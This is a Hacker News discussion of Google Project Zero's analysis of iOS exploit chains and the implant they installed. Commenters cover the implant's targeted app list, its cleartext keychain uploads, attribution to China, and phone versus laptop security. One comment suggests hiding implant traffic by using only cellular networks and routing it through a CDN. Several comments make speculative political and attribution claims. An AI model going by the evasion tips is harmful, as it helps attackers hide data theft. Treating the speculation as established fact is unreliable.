Hacker News new | past | comments | ask | show | jobs | submit login
A deep dive into iOS Exploit chains found in the wild (googleprojectzero.blogspot.com)
804 points by troydavis 9 months ago | hide | past | web | favorite | 182 comments



These are fascinating. It would be very interesting to know what the character and subject matter of the infecting sites were.

Outside of the great tech writeup, what is particularly interesting about this, to me, from a geopolitical perspective is the level of restraint.

The malicious actors in this case leveraged zero-days for iOS for years and yet do not seem to have overextended themselves or risk exposure by overly widening their intended targets. What I mean by this is: they clearly could have chosen to gain a massive infection rate by combining this with hacking a well-known popular site, or even pulling more visits from (say) social media, but instead the malicious actor chose to limit their intended recipients to run the exploits for a smaller set of targets for much longer while remaining undetected.

This, to me, hints at a state-actor with specific intent.


> Earlier this year Google's Threat Analysis Group (TAG) discovered a small collection of hacked websites. The hacked sites were being used in indiscriminate watering hole attacks against their visitors, using iPhone 0-day.

Crazy that the Implant was never detected directly on a phone. It's certainly visible to iOS itself, but apparently iOS isn't looking for unexpected processes running on the phone. As well, the Implant is sending network traffic that no one ever noticed or never tracked down. And presumably it has some affect on battery life. But all of this just disappears into the noise of everything else going on on an iPhone.

I wonder if the Implant ever showed up in any of the crash reports collected by iOS and uploaded to Apple.


It would be fun to check, but the attackers could just turn it off.

It's a user-facing option: https://support.apple.com/en-us/HT202100


Of course they could, but the Implant according to Google didn't make any attempt to hide itself.

I'm the tech lead for my company's in-house mobile app crash reporter. Every so often we get reports that make no sense. Sometimes they are corrupted in strange ways which I just chalked up to bad device memory or storage, but who knows if something like this wasn't the cause. Semi-related, but I used to have jailbreak detection in the crash reporter SDKs but I had to remove it. Just attempting to detect a jailbroken device was in some cases causing the SDK to crash because the anti-jailbreak detection code injected into the app was buggy.


If you are under constant attack from well funded enemies who want to destroy you, attacking iOS with well focused exploits is a good way of getting intelligence. The enemy may be lulled into a false sense of security on iOS and if the exploit goes undiscovered for a long time, a lot of intelligence can be obtained.


> the malicious actor chose to limit their intended recipients

I wonder how many people you would need to infect, on average, until you were detected?

I would guess, with this exploit chain, and the lack of auditing available of iOS internals, that the actual exploit could run 1 Billion + times before detection. The biggest risk is someone noticing the wedged webkit renderer process and going to try and debug it. I bet that causes oddities when hooked up to a mac with devtools open.

Of the whole thing, the HTTP network traffic is probably by far the biggest red flag - and perhaps 1 out of 10 million people might notice/investigate that. Simple things like never connecting over wifi (cell network is far harder to sniff), and redirecting traffic, encrypted, via a popular CDN would be a good way to hide it.


> redirecting traffic, encrypted, via a popular CDN would be a good way to hide it

True, but wouldn't that lead western three letter agencies to an account with a credit card attached? Sure, criminals can get stolen cards, but I imagine those have a limited lifespan and chasing after payment problems is not what the hacker wants to be doing.


This isn't script-kiddie level hacking. There were considerable resources spend to develop those exploits, probably by a nation state. Those actors not being able to get an untraceable CCs/identities is highly unlikely.

For a 3 letter agency, legal issues might be the bigger hurdle. E.g. you might have to make sure the data passing though the CDN and thus CDN itself isn't in some other justification when spying on your own cities.


> leveraged zero-days for iOS for years

Isn't that a problem with the iOS walled garden, not even security researchers can properly investigate users devices and detect infections like this, like they can with desktop operating systems...?


A step in the right direction: Apple recently announced that next year security researchers will have access to special iPhones: https://www.theverge.com/2019/8/8/20756629/apple-iphone-secu...


I agree this is "a step in the right direction", but if the iPhones are special, would the exploit run on them?

I suppose it depends on how "special" they are—do they run standard iOS with normal Safari and actual apps?


I think it just means they can run unsigned code. But yes, I would presume that Safari and the other default apps are present.


Production iPhones can do that already. Three phones probably give researchers root access and allow for disabling AMFI, etc.


No, it has nothing to do with that. The only difference is that you can’t buy snake-oil virus scanners in the iOS App Store because they can’t even pretend to work.


The Apple iOS model has advantages and disadvantages. The issue cited is not a problem unique to the iOS walled garden model.

See: CVE-2019-1162

See: CVE-2017-6074


I hear this a lot, but is it something that actually happens to a meaningful extent on other systems? Does it balance out the fact that black hats (and state sponsored) can find exploits that they would not have found otherwise if they didn’t have the source?


Absolutely. It is such a disgrace to open society that we have allowed our phones, computers and cars to be so taken over by corporate interest that we cannot even peek inside.

NB I heard some infosec research companies actually get rooted phones from Apple with some big caveats.


That's why Android is far safer. No exploits there.


This is what the free market chose. People bought these devices en masse and continue to do so.

It’s on us - the end user.


there‘s no better alternative.

no, please don‘t tell me about android. that‘s a fucked up mine field altogether.

we need to remember that there is no and will never be 100% security. while not open — which is worth nothing to the average user — we get pretty close with ios given all we know.


The list of apps being monitored which are hardcoded directly in the implant[1] include :

    com.yahoo.Aerogram
    com.microsoft.Office.Outlook
    com.netease.mailmaster
    com.rebelvox.voxer-lite
    com.viber
    com.google.Gmail
    ph.telegra.Telegraph
    com.tencent.qqmail
    com.atebits.Tweetie2
    net.whatsapp.WhatsApp
    com.skype.skype
    com.facebook.Facebook
    com.tencent.xin
[1] https://googleprojectzero.blogspot.com/2019/08/implant-teard...


This is an odd list. Some big messaging apps like Signal and Line are notably missing, while tools like Mail Master and Voxer seem like pretty minor players compared to the rest.

Is there a particular region of the world or community where this specific list makes most sense?


I suppose this list must be combined with the following explanation: "To be targeted might mean simply being born in a certain geographic region or being part of a certain ethnic group."[^1]

So the suspects are countries that fight against the autonomy of a region where the population is ethnically different. The most obvious suspect is China: they have gulag camps in Xinjiang where Uygurs are interned, up to 1.1 million according to the UN[^2]. The dominant ethnic in China is Han, and Uygurs have been oppressed for decades.

Of course, other countries could do this, but the probabilty of Birmania/Rohingya, SaudiArabia/Yemen… seems much lower. On a side note, Voxer seems to be quite proeminent in China, according to the popularity of their Android app[^3].

[^1]: https://googleprojectzero.blogspot.com/2019/08/a-very-deep-d...

[^2]: https://www.theguardian.com/world/2019/jan/11/if-you-enter-a...

[^3]: https://play.google.com/store/apps/details?id=com.rebelvox.v...


To shed some more light on the situation, the Uyghurs in the region had affirmative action programs and were exempt from the one child policy. They had more perks than regular Han Chinese.

However, with the spread of Salafism [1] in that region, China started to suffer multiple terrorist attacks a year. With the worst resulting in 35 deaths and hundreds injured [2].

As a result, to stop these terrorist attacks, China started these de-radicalization centres. Since then, there have been no attacks.

1. latimes.com/world/asia/la-fg-china-saudi-arabia-20160201-story.html

2. en.wikipedia.org/wiki/2014_Kunming_attack


> The most obvious suspect is China: they have gulag camps in Xinjiang where Uygurs are interned, up to 1.1 million according to the UN[^2]. The dominant ethnic in China is Han, and Uygurs have been oppressed for decades.

But China doesn't need exploits to spy on their iPhone-using citizens, right? Because Apple has been cooperating with the Chinese government.


Do you have some evidence of that? Aside from iCloud hosting and App Store censorship, I haven’t heard of a case where they’ve weakened security for the Chinese government.


"Aside from iCloud hosting" is a pretty big "aside"


It's a pretty big aside but it is not iOS


I must have been thinking of iCloud.


> Some big messaging apps like Signal and Line are notably missing

Line is mostly used in Japan, Signal is mostly used by nerds. So you can assume neither japanese peopel nor nerd were their primary target. Given that this is true for the vast majority of the world population I'd not call this odd.


I've recently seen a surge of non-nerd Signal users. Mostly random people from my contacts starting to use it.


Hopefully a popularity surge will translate into the app getting better. It's notably less pleasant to use than Telegram, which I'd think of as its closest competitor.


Given that Telegram uses an entirely different encryption scheme, and does not e2e encrypt by default, I'd consider Wire (using some variation of the Signal protocol) the closest competitor. And Wire is rather pleasant to use, with clients on many platforms, sign-up with phone number or email, encrypted voice chat, encrypted group chats, etc.


Wire is pretty good these days, but I'd go for Matrix due to it being federated.


See, I'd consider WhatsApp the closest competitor - it's the most similar feature-wise, and the Signal Foundation is primarily funded by one of the WhatsApp founders.


What features of Telegram are more pleasant? I don't use Telegram much due to its makeshift encryption scheme and bad defaults (no E2E by default), but I've found Signal extremely usable in the last year or two.


Opening up the picker for sending a picture was notably slow. Approximately a three second count from pressing the button to having the pictures available to choose from. Then similar occasional lags throughout the process (e.g. hitting "back" from a picture to return to the library and select a second picture).

By contrast, Telegram has a quick selection of the last few pictures available immediately, and the general picker opens quicker if you request it -- maybe because it's using the stock iOS picker rather than the custom one Signal implements?

Since sending a picture to a contact was a super common action of mine, this was incredibly frustrating.

Signal also had notification issues if I was running the desktop client at the same time. It'd sometimes clear notifications from my phone before I'd actually read them in either location.


Thanks. I've never encountered either of those issues, possibly because I'm on Android. Specifically, the photo quick selection is instant for me.


Telegram does not use the system iOS photo picker, since it asks for permission to access all photos on the system.


Might need that just for the initial recent-pictures bit?


There is also Facebook Messenger which seems to be missing, and "Messenger Lite", made for parts of the world without good connectivity, neither of which are on the list despite being very popular.


Line is the default messaging app in Taiwan, so one would assume that the Chinese government would be interested in targeting it.


com.tencent.xin makes a lot of sense in China https://en.wikipedia.org/wiki/Tencent_QQ


com.netease.mailmaster -- Netease is a Chinese App Platform


In addition though:

> The command-and-control server can also query for a list of all 3rd party apps and request uploads of their container directories.


These are all social networking services. Maybe, just maybe, this was tied to the PRISM program led by the NSA?


Maybe, just maybe, this was tied to the space program at NASA?

Tremendously unlikely, PRISM was something very different from this.


PRISM would have had to migrate to methods like this with the rise in e2e encryption.

I doubt they'd have written such shoddy and simple implant code though. At a minimum, they would have encrypted the data uploaded, since intelligence agencies love to steal data from other intelligence agencies, and sniffing wires I'm sure isn't unique to the USA.


No, PRISM had nothing to do with this at all. PRISM didn’t involve any sort of attack or offensive capability, and anything doing that would not be PRISM.


Wasn't PRISM mostly to spy on Americans? Most of the apps there aren't very popular in the US, and half of them are just straight up Chinese. Seems more like it would be a PRISM-like program but in some Asian country or China.


14 iOS exploits, including 0-days, and they upload all data to their C2 using plaintext http? With this level of sophistication I feel like it can only be intentional, but why?

edit: their implant is compiled unoptimized, has NSLog statements, serializes data by writing everything as files to /tmp (a "rather odd design pattern", as Ian Beer put it), in addition to the http issue just described. The implant/C2 code was likely written by a separate, less experienced team, than the one that wrote the exploit chains (which might have simply been purchased?).


Because the entity who supplied the exploit has no relation to the entity who supplies the implant and control framework. The latter is commodity developer work, easily done in house or via a defense contractor. It’s not unlikely that the exploit developer had no idea what it was being used in or how.


In my experience infosec people tend to be pretty awful programmers. They are experts at mining other people's code bases for common exploit patterns but not so great at the wider systems/engineering stuff.

But agreed it was probably purchased from some vuln dev and put together by some hack gov employee with some Microsoft certifications or (far less likely) some indifferent blackhat with powerful weapons well out of his scope, although 'black market zero day markets' are mostly non-existent hype. Especially for multiple iOS vulns. There's a good reason the cost of those exploits is so high given the low level of programming talent around in security.

Watering holes + "targeting sub-communities" typically mean spies hitting up some conference website or industry news thing. Who knows what country they are in and how sophisticated their local CS people are.


> In my experience infosec people tend to be pretty awful programmers.

Awful at using good design patterns, unit tests, and neat code maybe... But not "write everything to /tmp, tar it up and upload it cleartext".


Cleartext is the issue, here.

Even the most basic infosec folk will be aware to not do that - what this does is, as others have said, reveal that the developers were not the ones who found the exploit - it was likely simply purchased.


> With this level of sophistication I feel like it can only be intentional, but why?

Hehe, I have an idea, it is kind of crazy so I assign it <10% probability but if I where right it seems to kind of work:

Plausible deniability.

We all "know" that well funded three letter agencies wouldn't let shoddy work like this pass.

As long as you aren't afraid that anyone will capture it in transit this is a good way to avoid suspicion.

Which could explain why it was so overdone, to make sure everybody sees how unlikely it is that a state actor have done it.


They own all the pipes, why bother hiding what passes through them?


After thinking about this a little longer...

Not only does the attacker have no one they care about hiding from, but also: the lack of encryption is a secondary attack.

Sure, when Vizio did this, it was probably incompetence...but here...trivially encrypting data is simple stuff, why not do it here when siphoning large streams of personal data?

Because third parties using this data to attack the tracked victims doesn’t hurt the attacker, it in fact helps them. From the state sponsored actor’s perspective, they are merely using these exploits to track minorities and dissidents, but hey, if a third party happens to find this info and use it and that keeps the victims spun up and less effective at organizing? Win-win.


It leaves me in awe how good some hackers are, until it comes to hardening a Linux Server. The difference is astounding. Not knowing how to setup SSL on Apache, not knowing how to enable UFW (lol it’s “sudo ufw enable”), etc. Never was sure why that dichotomy was there. Then again I’m a terrible pentester but am very good at Linux.


This is terrifying. Just thinking about the data on a typical phone... the Implant could easily grab everything it needs to empty all of your financial accounts.

The only way to be safe is probably to access your financial sites from a browser running inside a VM, maybe even a dedicated laptop, and never sync the passwords to anywhere outside the VM unencrypted.

Ouch.


>The only way to be safe is probably to access your financial sites

These folks don't want money.

And statue protects you from fraud - just set up text and email alerts so large transactions alert you ASAP.


Except they have control of the phone and can intercept text and email alerts, if not with these exact vulnerabilities, it doesn't seem far fetched. And getting funds returned takes time while bills still have to be paid.

These folks may not want money, but the phone is vulnerable and the next set of folks may. Do you really think the crooks who commit identity theft and ransomware attacks aren't salivating at these attacks?


>Do you really think the crooks who commit identity theft and ransomware attacks aren't salivating at these attacks?

I think the nation states that will want to use them will clamp down hard on two bit hustlers who interrupt the fun.


I mean that’s generally true but depends on which state actor. North Korea definitely wants your money (or crypto) but Russia doesn’t.


Russia could hypothetically be interested in using your bank account to exfiltrate funds past sanctions though...


The dedicated laptop would be smarter idea. Running "sensitive" tasks from VM doesn't provide much protection if the host might be compromised.


I guess you'd have to worry about malware breaking out of the VM as well, but are there many exploits that do that these days?


That's hard to say, but both VirtualBox and VMware were hacked this year[1]. Definitely most secure would be both dedicated PC and running everything facing outside from VM. (and using SELinux or AppArmor as well).

[1]: https://securityaffairs.co/wordpress/82702/breaking-news/pwn...


What about a VM that is actually an emulator like Bochs?


Well, you don't necessarily have to jump from one to the other. If you currently do financial stuff on your phone, just enabling 2FA and only browsing them on your laptop is already an enormous step up. There are cases where additional precautions are warranted, but there's no reason to let the perfect be the enemy of the good.


Switching from an iPhone to a laptop is a huge step down in security, even with 2FA.

Orders of magnitude more 0-days on whatever software is running on that laptop than on iOS.

This is bad advice.


I disagree. 2FA makes it profoundly more difficult to compromise an account. Most people are using a phone as a second factor, so even if the apps don't store files and credentials directly on the device (always in doubt, as seen here), if you have root on a phone you can compromise an account without any user interaction.

What's more, every time you download a banking app on your phone, you have to place a little bit of trust in the competence of whoever the bank outsourced the programming job to. At least with a laptop, a poorly designed website site is not (by itself) a threat to everything on your computer or other sites you visit.

Even when it comes to "more 0-days", I think you're probably missing the point. There's a lot more software written for computers that can be compromised than just the handful of programs that comprise iOS, so the raw count is not very meaningful. More practically, I'm willing to bet the odds my (Linux) laptop is compromised are far lower than my phone. I don't install apps I don't trust on my computer, but I have little choice but to on my phone.


> What's more, every time you download a banking app on your phone, you have to place a little bit of trust in the competence of whoever the bank outsourced the programming job to. At least with a laptop, a poorly designed website site is not (by itself) a threat to everything on your computer or other sites you visit.

Both would require a 0-day exploit to be a threat.


> 2FA makes it profoundly more difficult to compromise an account.

Just because the attacks are dumb.

If your computer is pwned, it should wait for you to 2FA, and then when you "log out"-- don't, do malicious stuff instead.


That's why 2FA should be performed at transaction confirmation time for sensitive operations, not just at login or periodically.


Even then; substitute the transaction they want for another transaction.

If the device you are using is compromised, you're in for a bad time.

You could send some simple transaction summary to the other device to acknowledge, which is getting better. Even so that doesn't completely eliminate the opportunity for tomfoolery.


If you sign with a 2FA I can not see how a compromised computer can make that insecure. Though I will say, the UX on 2FA signing needs to get better, but it is secure enough.


If the 2FA doesn't contain the actual transaction detail, pretty simply.

When user tries to transfer $1,000 of cash from user's investment account to user's bank account, instead, initiate transferring $100,000 to EvilGuy's bank account. Rewrite elements so it appears that $1,000 is being transferred to user's bank account, and wait for user to receive their 2FA code and authenticate. This may be as easy as string replacement both ways.


maybe in a windows laptop, but people who run laptops using linux probably have more security in the laptop than on their phone, most browsers are pretty safe.


I find this hard to believe given that security isn't about "having security", but about "not having buggy software". Unless you're a power user, you're probably mostly just using web applications at this point, so your main target points are the OS and the web browser.

Someone "using Linux" is likely to be running various things such as SSH/HTTP/file servers, native IRC clients, random build systems (running "npm install" instills a lot of trust on the NPM repository and any packages involved). All of these things increase the attack surface.


> Someone "using Linux" is likely to be running various things such as SSH/HTTP/file servers, native IRC clients, random build systems (running "npm install" instills a lot of trust on the NPM repository and any packages involved). All of these things increase the attack surface.

This is a fallacy. Rather than assessing the security of the linux kernel or linux distributions you're making taking an assumption about linux users and transferring the blame for their insecure practices onto linux itself.

Think of it this way: If a random Windows user that didn't engage in such behavior was to switch to linux it's unlikely that would suddenly change. If the linux kernel and system programs are more secure than windows that make linux a good choice if that person cares about security.

Note: I'm not making a statement about the security of linux/windows, just pointing out a flaw in the above argument.


> Rather than assessing the security of the linux kernel or linux distributions you're making taking an assumption about linux users

I was responding to that assumption made by the parent:

> people who run laptops using linux probably have more security in the laptop than on their phone


The argument from the parent about using a laptop is "orders of magnitude" less safe than using a iOS or android device is just not true. It depends what you're running on each device.


When you run any given application on your laptop, it's normally run in such a way that it has all of your user's priveleges on the system; that is, it can access all files that you can access, it can look at the screen that you're looking at, it can produce any input that you can produce, it can manipulate the memory of any process that you can manipulate.

When you run an application on iOS or Android, it doesn't have those capabilities. It can only get them through security exploits. In theory it should be similar to looking at a web page. If a web page is able to read arbitrary files, that's obviously a bug in the system. If an application on your laptop is able to read arbitrary files, that's standard functionality.


You're right that from a defense standpoint, sandboxed OSes like Android and iOS are "better" than your average laptop. Granted. The point I (and probably your parent comment) were originally trying to make is that the amount of data stored on a phone makes it a very good target for vulnerabilities like these. None of my banking, chat, email, etc information is stored on my laptop because I access these things through the browser. That's not to say that this provides perfect security, of course, but it means someone can't come in with a zero-day that gets root on my system and just one-off uploads all my databases.

Apps that keep all this data locally, as is common on phones, are dangerous. Add the fact that most people have a phone as their two factor and you have a really bad situation when a phone is compromised. This, alone, makes phones an attractive target.


> because I access these things through the browser.

Meaning the session cookies are stored on your computer, meaning I can steal those and then do whatever nefarious things I want to do off-box. Locality is a myth, attackers don't care about that. They just want the data, and finding/weaponizing bugs is the hard part.


Regular people keep copies of banking, chat, emails printouts on their "My Documents", even if they use Web applications instead of native ones for those services.

Speaking of native applications, usually many regular users still use native native applications for email, chat, text processing, spreadsheets, etc.

So while you specifically might take care of having a very clean $HOME, most people don't.


Depends pretty much on what they are actually running.

https://www.cvedetails.com/vendor/33/Linux.html


Using disappearing messages (eg: Signal) is also good.

If compromised, the attacker doesn't get a long log of comms, just a week's worth.


A while ago, Google showed messages at the top of Gmail for some users "We believe state-sponsored attackers might be attempting to compromise your account or computer".

If they had send some OAuth tokens for a honeypot gmail account to the C&C server used for these attacks, they could then track the usage patterns of that token, and find all the other attacked users. Perhaps thats how they identified who was being attacked?


I was thinking the exact same thing. It's possible that because it has been so long since Google identified this threat actor, they did in fact use a honeypot account to trace the attackers prior to burning them.


Given the depth of China's interest in controlling and accessing dissidents worldwide, I would think it highly likely that China is behind the entire exploit. What I did not see in the articles (too many to read everything) is the requirement to inject the implant from a website. Did the article indicate what sites were compromised?


Nope. But given that the write-up talks about victims being victims merely for being in a geographical region makes me immediately think about wifi portals, and ISP/telecom-injection via DNS hijacking.

We already know that ISPs routinely hijack your DNS queries to snarf your search queries, inject ads, redirect you to cached versions of big sites to “speed up your experience”, warn you of virus infection, etc etc.

It would be trivial for a state actor to use the same mechanism to redirect you to a site that, say, looks like Google, passes your search query to Google, retuns Google, but also serves up the js that pushes the implant.

Really pushes the issue that everyone — especially activists and targeted minority groups — need to be educated about DNS and proper VPN usage (a misconfigured VPN would not help here), and it would be awesome if device makers made checking and verifying this stuff easier for normal-grade users.


You don't need to compromise an ISP to do this stuff. Just use a shady ad-network to deliver malware or links in the same way that targeted ads are delivered.

I'm not a sophisticated state actor, but I were going to try to deliver a message to a group of people, I'd use ad networks to target the geography or population that I was interested in. A bad actor could easily get a shitty ad network to deliver all sorts of payloads.


If it’s a state actor, as has been alluded to, they’re not compromising the ISP, they are the ISP.

But yeah, absolutely, great point - shitty ads are doable AND geo-targetable!


Anyone know what kinds of sites were hacked to target iOS visitors to the sites, and who might have been targeted by these attacks? The blog post hints at the targeting of dissidents, but I'm not sure whether that is a general concern or actually there in these hacks.


Just a wild and crazy guess here...but if you take this tweet thread: https://twitter.com/adrianzenz/status/1145778611242319874 in context with the following hint:

"To be targeted might mean simply being born in a certain geographic region or being part of a certain ethnic group." (https://googleprojectzero.blogspot.com/2019/08/a-very-deep-d...)

...and then if you think about what's been going on in Hong Kong recently -- search iPhone and Hong Kong in both languages and you'll find some interesting posts on Twitter that appear not to want folks to know that:

"All that users can do is be conscious of the fact that mass exploitation still exists and behave accordingly; treating their mobile devices as both integral to their modern lives, yet also as devices which when compromised, can upload their every action into a database to potentially be used against them." (https://googleprojectzero.blogspot.com/2019/08/a-very-deep-d...)

...it kind of reveals itself.


What’s the relation to the first link though? That looks like an old twitter thread.


Did you look at the screenshot and read the translation? Appears to be a real-time tracking database of Uighurs...


In the first link? Yes, but what does the first link have to do with this attack? I see nothing that ties the two together. Am I missing something in the Google link that relates to that? The list of target services doesn’t even look similar.


“The command-and-control server can also query for a list of all 3rd party apps and request uploads of their container directories.”


> dissidents

If nothing else, that would be a pretty good guess, given that amateurs don't have the skill to come up with "five separate, complete and unique iPhone exploit chains", and a professional team with the skill to create them is either going to report the vulnerabilities (white hat) or sell them on the black market, or at least try to infect a large number of people. The specificity of putting them on a single website with only "thousands" of views per week suggests that someone wanted to target visitors of that site specifically, not just for financial gain.


> It is worth noting that none of the exploits bypassed the new, PAC-based JIT hardenings that are enabled on A12 devices.

I'm surprised Apple doesn't talk more about how they're continuously upgrading the security of iPhones with new chip generations. I remember the BlackHat presentation on iPhone security from a few years ago [0] also found that there were attacks on older iPhones which didn't work on the (then-)newer ones. Is Apple afraid it will give the impression that existing phones are not secure?

[0]: https://news.ycombinator.com/item?id=12231758


It is also worth noting that PAC is not a panacea. It's just one more thing to break before an attacker takes control. Given that one of the keys used in PAC is shared across all user-space processes including highly privileged unsandboxed processes (it must, as it's used by shared dynamic libraries), it's just a matter of finding one more user-space bug to leak the key and break PAC.


Even if the same key is shared by all processes, keys are stored in registers that are meant to be not accessible to userspace, so a disclosure vulnerability would not help here anyways.


You don't need to get the key per se, depending on your exploit. You just need a single valid signed pointer that's involved in your ROP gadget.


Apple gave a talk this year at BlackHat that talked about some of the new security mechanisms.


And researchers gave a talk this year at DEF CON that talked about defeating this exact security mechanism.


Link?



You don’t need PAC if you disable scripts in Safari. Besides, baseband/browser/iMessage vulnerabilities are in the same price range. [i]

It also isn’t difficult to infer what a “code signing bypass” is, so I guess being arrested is a good excuse to buy a new phone? (Assuming we’re talking about a state based actor, in control of the territory you live in)

i. https://zerodium.com/program.html


> You don’t need PAC if you disable scripts in Safari.

Safari has multiple JITs. For example, aside from the JavaScriptCore compiler, there’s also a CSS selector JIT.


Talking about security inevitably triggers fear. That’s fine for some products, but absolutely unacceptable for large consumer brands with positive reputations.


Perhaps it would behoove security-sensitive users to use such devices, but they make up a tiny fraction of all iOS devices in the field. 90% of deployed iOS devices in the USA lack the A12 CPU and the number is higher abroad. Obsolete 32-bit CPUs are more common than CPUs with PAC.


> Obsolete 32-bit CPUs are more common than CPUs with PAC.

According to this (taken soon after iPhone XS/XR went on sale) this is not true: https://www.statista.com/statistics/755593/iphone-model-devi...


That apparently costs $50/mo to read. But it seems to discuss iPhone only. The universe of iOS devices is not limited to iPhones.


As a side note: given all the security resources Google has, why Android is still not considered safer than iOS? What mistakes has Google made with Android, and how could they be fixed?


All things considered, I'd say Apple has done an excellent job wrt security for iOS devices. All modern iOS devices are updated on a regular basis with a high uptake rate, and Apple monitors its store and is increasing its use of bug bounties. And with these exploit chains, Apple has addressed the issues quickly.

The downside of Android being an open platform is that Google is limited in forcing vendors to update their devices - and most do not. That said, Android has had regular monthly security releases for years, and the Pixel devices are excellent from a security perspective. Google also monitors its app store - as well as the full Android ecosystem (as far as Google Play Services is installed) for potentially harmful applications. This is why you regularly see articles along the lines of "Google removes malware from the Play Store that has had X installs!"

I'd say the biggest vulnerability for Android users given its impressive scale is a vulnerability in a vendor's supply chain. Given the complexity of devices, a vendor likely has multiple places where a malicious actor could insert malware into an Android device. I think this is why US intel has ultimately decided devices from China - Huawei in particular - are untrustworthy. If you can't validate every component of a device and trust the vendor will always audit its security, then it's hard to trust a device, even if it is safe right now.


I suspect the main issue is that regardless of what Google does, manufacturers still need to make any new updates available, which most do not for anything but their most recent models.


The compatibility definition document for Android gets it pretty secure, but realistically the only secure Android devices are Pixels in my opinion.


This is terrifying... most people do not hard reset their phones ever (even when upgrading). What are the odds that these payloads are floating around despite the exploits being patched?


From the article, a reboot will do it. You dont need a hard reset :

"The implant binary does not persist on the device; if the phone is rebooted then the implant will not run until the device is re-exploited when the user visits a compromised site again. "


The implant is gone, but the attacker still has keychain data and can/did/does use it to continue downloading data in clear text:

“The implant uploads the device's keychain, which contains a huge number of credentials and certificates used on and by the device. ... The keychain also contains the long-lived tokens used by services such as Google's iOS Single-Sign-On to enable Google apps to access the user's account. These will be uploaded to the attackers and can then be used to maintain access to the user's Google account, even once the implant is no longer running. ... There's something thus far which is conspicuous only by its absence: is any of this encrypted? The short answer is no: they really do POST everything via HTTP (not HTTPS) and there is no asymmetric (or even symmetric) encryption applied to the data which is uploaded. Everything is in the clear.”

(Source: https://googleprojectzero.blogspot.com/2019/08/implant-teard...)


Ever worst part is this

“they really do POST everything via HTTP (not HTTPS) and there is no asymmetric (or even symmetric) encryption applied to the data which is uploaded. Everything is in the clear. If you're connected to an unencrypted WiFi network this information is being broadcast to everyone around you, to your network operator and any intermediate network hops to the command and control server.”

So not only your photos, contacts, msgs are stollen but then they are sent to attacker on http so the data is logged probably on every router, modem and wifi sniffers.


That's not the worst part. The worst part is the attacker getting the data. The slight chance that while you're infected you also happen to be on a public wifi in the same room at the same time as a random opportunistic hacker, or that an ISP employee is risking their job by combing through petabytes of transient customer data, is much less concerning.


Attacker already got the data http or https. But by publishing over http...other sniffers of public traffic also get your data.


Maybe just to get data broadcasted is the goal, and having that reaching a centralised server is not the primary goal; imagine an operational theatre.


This makes sense if a state level actor, with global network visibility (including playback capabilities, aka XKEYSCORE and TEMPORA) is behind it.

Even if a C&C server is taken down, they would still be able to persist the data.


Surprising. Is it really that much more effort to make a HTTPS call instead?


I wonder what happens when Apple distribute the update and it detects this is on your phone. Do they even notify you?


IANAL but shouldn’t this be a requirement within the GDPR? As a data operator, an organisation has the obligation to disclose any loss/leak of data, so this should be enforced.


I'm wondering about this too. The GDPR requires a public notification. Why the hell is this coming from flippin' Google?! Why don't we have numbers on how many users were affected? Why isn't there a way to see if you're the one affected?


There was no Apple data breached. User endpoints were attacked, using various well crafted exploits against their software. This isn't a GDPR (privacy) issue, no company data was leaked, its end user data from their device. Apple tries to protect your data on their devices, but all software has bugs. Bad guys will try to exploit these bugs to reach their goals.

Google does research into making it hard for attackers to compromise user devices. That is the purpose of PZ team. There are no numbers because nobody has these numbers except for the attacker. I am guessing Google has some ball park numbers based on search traffic or web analytics.

If you want to know if you were affected, you need to ask yourself if powerful adversary wants access to your data, possibly because of civil unrest occurring in their territory; and if you visit strange websites related to this. Only the adversary knows for sure, not Apple, Not Google.


The GDPR doesn’t care where the personal data is stored, I thought. It makes no distinction as far as I can tell between data stored on a web server and data stored on a device. You seem to be making a distinction. Is there a source you could reference?


I don’t know the updates would detect this. and Even if it did, I doubt apple would say anything.


Well, according to the article they pushed the fix six months ago, so apparently not.


The update would restart your device and wipe the malware.


Do you think theres a bank of iPhones at Google loading every webpage on the internet, and looking for unexpected background processes or network traffic?


Yes. Or some virtualized equivalent.


That's what the crawler infra can be used for. It can easily be adjusted for this purpose.


Either that or they have specialized web-crawlers that emulate various browsers.


Emulating a browser wouldn't be good enough for most exploits. Most stealthy malware immediately deactivates itself if it thinks it is on an emulated or virtualized system.


First, most malware is not that sophisticated. While some does vm detection, most (as is the case here) does not. Second, VM detection is an arms race. See for example the vmcloak project. Third, with the rise of BYOD and VDI, vm detection is less common in sophisticated malware as the target is frequently virtualized. Fourth, vm detection is harder for arm than x86. Fifth, vm detection detection via static analysis is very effective.


If I understood what little I read of the exploit details, it actually loads an opaque payload through WebGL calls, so simply crawling with an iPhone's user-agent wouldn't be enough to notice anything "fishy". The site can just serve the payload to all visitors, then the implant will get installed if the resulting kernel calls are broken as described in the article.


It might be good enough to flag "interesting" websites for further research on native (or emulated native) environments


Maybe. The article seems to imply that this implant was given to all comers, which may explain how Google found it.


I think it’s more likely that Google researchers were sent these exploits or stumbled upon them through manual research.


It's staggering how systematically broken IOKit remains.


Technically these are bugs in IOKit drivers and not the IOKit framework itself: it’s a footgun and not an exploding gun.


True, but drivers methods are exposed through IOKit framework, which clearly does not even attempt in reducing the attack surface, and instead, makes the exploitation easier. Thus, its design appears to be fundamentally broken.


It seems the webkit renderer process goes into an infinite sleep when this exploit is used. Since iOS doesn't use a seperate renderer for different web domains/iframes, that would mean the entire tab will freeze.

Surely that would be a pretty big giveaway for the user - "I was just browsing round the bombmaking-for-dummies webpage, and my browser just froze, and I had to kill it and reopen it".


Safari on iOS is pretty much the most unstable browser I have been using in the last ~5 years. I can't count how many times I had to kill and repopen Safari just because it froze on some Youtube video.

So, no this is not a big giveaway.

Unless something on the Youtube site targeted my own and most of my friends' iOS devices, of course.


Really? The only time I have it freeze is on early betas or when I visit a million-page-long PDF or something. I wonder if it is worse on devices with 1GB of RAM or if I’ve just gotten lucky.


I don't have an iOS device with less than 2GB of RAM. So I don't think memory is an issue.


Never happened to me.


What does this mean ? Should I reset all my passwords just incase ?

“Given the breadth of information stolen, the attackers may nevertheless be able to maintain persistent access to various accounts and services by using the stolen authentication tokens from the keychain, even after they lose access to the device.”


The attackers could have stolen your 2FA tokens (e.g. if you use Authy or Google Authenticator) - you need to reset those as well in addition to your passwords


Tweet for defenders on how to spot the sites: https://twitter.com/craiu/status/1167358457344925696


Any way to check if my iPhone is affected? I'm still on 12.1.2, which was released before the fix, so if I'm affected, I should still have the malware on my device.

I'm not opposed to jailbreaking to check.


The implant binary does not persist on the device; if the phone is rebooted then the implant will not run until the device is re-exploited when the user visits a compromised site again. [1]

1. https://googleprojectzero.blogspot.com/2019/08/implant-teard...


